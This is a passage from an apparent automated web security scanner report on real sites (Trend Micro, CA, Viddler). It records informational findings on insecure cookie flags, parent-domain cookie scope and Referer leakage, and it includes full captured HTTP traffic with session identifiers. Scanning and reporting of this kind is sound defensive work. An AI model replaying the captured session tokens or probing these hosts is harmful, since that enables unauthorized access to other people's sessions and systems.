HTTP/1.1 200 OK Server: nginx/0.6.32 Date: Tue, 06 Sep 2011 20:52:08 GMT Content-Type: text/html;charset=UTF-8 Connection: keep-alive X-Viddler-Node: viddler_a Vary: Accept-Encoding Content-Length: 3047 <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>ep105 Cloud Computing and the Law</title> <meta name="description" content="ep...[SNIP]... h="100%" height="100%" type="application/x-shockwave-flash" allowScriptAccess="always" allowFullScreen="true" allowNetworking="all" id="viddler_dca1712" flashVars="f=1&autoplay=f&disablebranding=f&ref=http%3A%2F%2Fblog.proofpoint.com%2F&enablejsapi=t&enablecallbacks=t&playerapiid=viddler_dca1712f=1offset=0" wmode="direct"></embed> </div></div></body> </html>
Request 2
GET /embed/dca1712/?f=1&offset=0&autoplay=0&disablebranding=0 HTTP/1.1 Host: www.viddler.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Server: nginx/0.6.32 Date: Tue, 06 Sep 2011 20:52:31 GMT Content-Type: text/html;charset=UTF-8 Connection: keep-alive X-Viddler-Node: viddler_p Vary: Accept-Encoding Content-Length: 3012 <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>ep105 Cloud Computing and the Law</title> <meta name="description" content="ep...[SNIP]... h="100%" height="100%" type="application/x-shockwave-flash" allowScriptAccess="always" allowFullScreen="true" allowNetworking="all" id="viddler_dca1712" flashVars="f=1&autoplay=f&disablebranding=f&ref=&enablejsapi=t&enablecallbacks=t&playerapiid=viddler_dca1712f=1offset=0" wmode="direct"></embed> </div></div></body> </html>
9.3. http://www.viddler.com/player/dca1712/0
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.viddler.com
Path:
/player/dca1712/0
Request 1
GET /player/dca1712/0 HTTP/1.1 Host: www.viddler.com Proxy-Connection: keep-aliveReferer: http://www.viddler.com/embed/dca1712/?f=1&offset=0&autoplay=0&disablebranding=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=DC8238792E28BE1C2E55FB125CE85F54.viddler_a
Response 1
HTTP/1.1 302 Found Server: nginx/0.6.32 Date: Tue, 06 Sep 2011 20:52:11 GMT Content-Type: text/html; charset=iso-8859-1 Connection: keep-alive Location: http://www.viddler.com/bigPlayerChooser.action?ref=www.viddler.com&key=dca1712&offsetTime=0 Vary: Accept-Encoding Content-Length: 355 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.viddler.com/bigPlayerChooser.action?ref=www.viddler.com&key=dca1712&offsetTime=0">here</a>.</p> <hr> <address>Apache/2.2.16 Server at www.viddler.com Port 80</address> </body></html>
Request 2
GET /player/dca1712/0 HTTP/1.1 Host: www.viddler.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=DC8238792E28BE1C2E55FB125CE85F54.viddler_a
Response 2
HTTP/1.1 302 Found Server: nginx/0.6.32 Date: Tue, 06 Sep 2011 20:52:38 GMT Content-Type: text/html; charset=iso-8859-1 Connection: keep-alive Location: http://www.viddler.com/bigPlayerChooser.action?ref=&key=dca1712&offsetTime=0 Vary: Accept-Encoding Content-Length: 340 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.viddler.com/bigPlayerChooser.action?ref=&key=dca1712&offsetTime=0">here</a>.</p> <hr> <address>Apache/2.2.16 Server at www.viddler.com Port 80</address> </body></html>
10. SSL cookie without secure flag set
previous
next
There are 3 instances of this issue:
Issue background
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
10.1. https://store.trendmicro.com/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://store.trendmicro.com
Path:
/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerp-drh-dc2pod9-pool1-active=1661075978.260.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js HTTP/1.1 Host: store.trendmicro.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://store.trendmicro.com/store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage Cookie: __qca=P0-1207819931-1315351119372; bn_u=6923713920140458023; __utma=44797537.1048817980.1315351191.1315351191.1315351191.1; __utmz=44797537.1315351191.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; fsr.r={"d":90,"i":"1315351193052_377417","e":1315956018002}; __unam=e9c3bfd-132410b0872-607b674b-1; ORA_WX_SESSION=10.2.2.129:260-0#0; JSESSIONID=885803A57111A855BDA3F7D5608FCD0D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6
Response
HTTP/1.1 200 OK Cache-Control: max-age=157788000 Expires: Thu, 02 Jun 2016 03:00:48 GMT ETag: "80d-4891f577" Content-Type: application/x-javascript Last-Modified: Thu, 31 Jul 2008 17:25:11 GMT Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=7200+0;age=2440;ecid=105660496814,0) Content-Length: 2061 Date: Thu, 02 Jun 2011 21:00:48 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app93 Accept-Ranges: bytesSet-Cookie: BIGipServerp-drh-dc2pod9-pool1-active=1661075978.260.0000; path=/ var ptomodule={A:{},C:{},D:document,L:document.location,M:[],Q:{},T:new Date(),U:'',V:'2.7',Enabled:true,ST:"script",SA: {"type":"text/javascript"},I:function(){var s=this.L.search;var c=this.D.cooki...[SNIP]...
10.2. https://www.ca.com/siteminderagent/forms/login.fcc
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/siteminderagent/forms/login.fcc
Issue detail
The following cookie was issued by the application and does not have the secure flag set:target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3fCATARGET=LVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ==; path=/; domain=.ca.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /siteminderagent/forms/login.fcc HTTP/1.1 Host: www.ca.com Connection: keep-alive Referer: https://www.ca.com/us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 Content-Length: 3488 Cache-Control: max-age=0 Origin: https://www.ca.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351598983:ss=1315351389192 __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJODc0ODU5MzQ3D2QWAgIBEGRkFghmD2QWDgIJDxYEHgRocmVmBSJodHRwOi8vd3d3LmNhLmNvbS91cy9wcm9kdWN0cy5hc3B4Hglpbm5lcmh0bWwFCHByb2R1Y3RzZAIKDxYEHwAFLmh0dHA6Ly...[SNIP]...
Response
HTTP/1.1 302 Object Moved Cache-control: no-store Location: /register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3d Content-Length: 0set-cookie: target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3fCATARGET=LVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ==; path=/; domain=.ca.com set-cookie: SMTRYNO=1; path=/; domain=.ca.com
10.3. https://www.ca.com/us/register/login.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/login.aspx
Issue detail
The following cookie was issued by the application and does not have the secure flag set:SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1 Host: www.ca.com Connection: keep-alive Referer: http://www.ca.com/us/default.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/ X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 18:23:42 GMT Content-Length: 36056 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"> <meta htt...[SNIP]...
11. Cookie scoped to parent domain
previous
next
There are 2 instances of this issue:
Issue background
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
11.1. https://www.ca.com/siteminderagent/forms/login.fcc
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/siteminderagent/forms/login.fcc
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3fCATARGET=LVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ==; path=/; domain=.ca.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /siteminderagent/forms/login.fcc HTTP/1.1 Host: www.ca.com Connection: keep-alive Referer: https://www.ca.com/us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 Content-Length: 3488 Cache-Control: max-age=0 Origin: https://www.ca.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351598983:ss=1315351389192 __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJODc0ODU5MzQ3D2QWAgIBEGRkFghmD2QWDgIJDxYEHgRocmVmBSJodHRwOi8vd3d3LmNhLmNvbS91cy9wcm9kdWN0cy5hc3B4Hglpbm5lcmh0bWwFCHByb2R1Y3RzZAIKDxYEHwAFLmh0dHA6Ly...[SNIP]...
Response
HTTP/1.1 302 Object Moved Cache-control: no-store Location: /register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3d Content-Length: 0set-cookie: target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3fCATARGET=LVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ==; path=/; domain=.ca.com set-cookie: SMTRYNO=1; path=/; domain=.ca.com
11.2. https://www.ca.com/us/register/login.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/login.aspx
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1 Host: www.ca.com Connection: keep-alive Referer: http://www.ca.com/us/default.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/ X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 18:23:42 GMT Content-Length: 36056 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"> <meta htt...[SNIP]...
12. Cross-domain Referer leakage
previous
next
There are 12 instances of this issue:
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form. If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise. You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application. Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure. Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
12.1. http://blog.trendmicro.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/
Issue detail
The page was loaded from a URL containing a query string:http://blog.trendmicro.com/?p=12640 The response contains the following links to other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1 http://blog.trendmicro.de/ http://countermeasures.trendmicro.eu/ http://del.icio.us/post?url=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/ http://edge.quantserve.com/quant.js http://free.antivirus.com/ http://libs.coremetrics.com/eluminate.js http://pixel.quantserve.com/pixel/p-88yo-3lmt3UHI.gif http://platform.twitter.com/widgets.js http://static.ak.fbcdn.net/connect.php/js/FB.Share http://technorati.com/faves?add=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/ http://twitter.com/share http://widgets.twimg.com/j/2/widget.js http://www.facebook.com/Trendmicro http://www.facebook.com/plugins/like.php?locale=en_US&href=http://blog.trendmicro.com/xss-methods-also-seen-being-used-in-mass-compromises/&layout=button_count&show-faces=false&width=83px&action=like&colorscheme=light http://www.google.com/bookmarks/mark?op=edit&bkmk=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/ http://www.myspace.com/Modules/PostTo/Pages/?u=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/ http://www.newsvine.com/_tools/seed&save?u=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/ http://www.simplysecurity.com/ http://www.stumbleupon.com/submit?url=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/ http://www.twitter.com/TrendLabs http://www.youtube.com/trendmicroinc
Request
GET /?p=12640 HTTP/1.1 Host: blog.trendmicro.com Proxy-Connection: keep-alive Referer: http://us.trendmicro.com/us/search/?q=xss&search.x=2&search.y=10&search=search User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fsearch%2F%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350988973%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22l%22%3A%22XSS%20Methods%20Also%20Seen%20Being%20Used%20in%20Mass%20Compromises%22%2C%22rb%22%3A%221%22%2C%22ri%22%3A%221%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%22%2C%22nw%22%3A393%2C%22nl%22%3A141%7D%7D
Response
HTTP/1.1 200 OK Server: nginx/0.8.54 Content-Type: text/html; charset=UTF-8 Pragma: no-cache X-Pingback: http://blog.trendmicro.com/xmlrpc.php test : test X-Mobilized-By: WordPress Mobile Pack 1.2.4 Link: <http://blog.trendmicro.com/12640>; rel=shortlink Link: <http://blog.trendmicro.com/?p=12640>; rel=shortlink X-Varnish: 1696291508 Content-Length: 55144 Vary: Accept-Encoding Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Tue, 06 Sep 2011 18:16:26 GMT Date: Tue, 06 Sep 2011 18:16:26 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profile="http:...[SNIP]... </script><script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'> </script>...[SNIP]... <map name="Map"> <area shape="rect" coords="22,14,57,48" href="http://www.facebook.com/Trendmicro" target="_blank" alt="Trend Micro Facebook"> <area shape="rect" coords="62,15,99,47" href="http://www.twitter.com/TrendLabs " target="_blank" alt="TrendLabs Twitter"> <area shape="rect" coords="101,15,134,49" href="http://feeds.trendmicro.com/Anti-MalwareBlog/" target="_blank" alt="Malware Blog RSS Feed"> <area shape="rect" 